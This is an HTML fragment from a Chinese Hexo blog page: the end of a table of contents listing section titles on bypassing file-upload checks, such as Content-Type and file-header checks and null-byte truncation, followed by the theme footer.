class="toc-text">1. 禁用JavaScript</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#2-%E4%BD%BF%E7%94%A8BurpSuite%E7%AD%89%E5%B7%A5%E5%85%B7"><span class="toc-number">1.5.0.2.3.2.</span> <span class="toc-text">2. 使用BurpSuite等工具</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E6%9C%8D%E5%8A%A1%E7%AB%AF%E6%A3%80%E6%B5%8B%E7%BB%95%E8%BF%87"><span class="toc-number">1.5.1.</span> <span class="toc-text">二、服务端检测绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#2-1-%E6%89%A9%E5%B1%95%E5%90%8D%E6%A3%80%E6%9F%A5"><span class="toc-number">1.5.1.1.</span> <span class="toc-text">2.1 扩展名检查</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-2-Content-Type%E6%A3%80%E6%9F%A5"><span class="toc-number">1.5.1.2.</span> <span class="toc-text">2.2 Content-Type检查</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-3-%E6%96%87%E4%BB%B6%E5%A4%B4%E6%A3%80%E6%B5%8B"><span class="toc-number">1.5.1.3.</span> <span class="toc-text">2.3 文件头检测</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-4-%E9%99%90%E5%88%B6Web%E6%9C%8D%E5%8A%A1%E5%99%A8%E8%A1%8C%E4%B8%BA"><span class="toc-number">1.5.1.4.</span> <span class="toc-text">2.4 限制Web服务器行为</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-5-00%E6%88%AA%E6%96%AD"><span class="toc-number">1.5.1.5.</span> <span class="toc-text">2.5 00截断</span></a></li></ol></li></ol></li></ol></li></ol></div></div><footer><nobr>构建自 <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> 使用主题 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr> 主题作者 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas></body></html>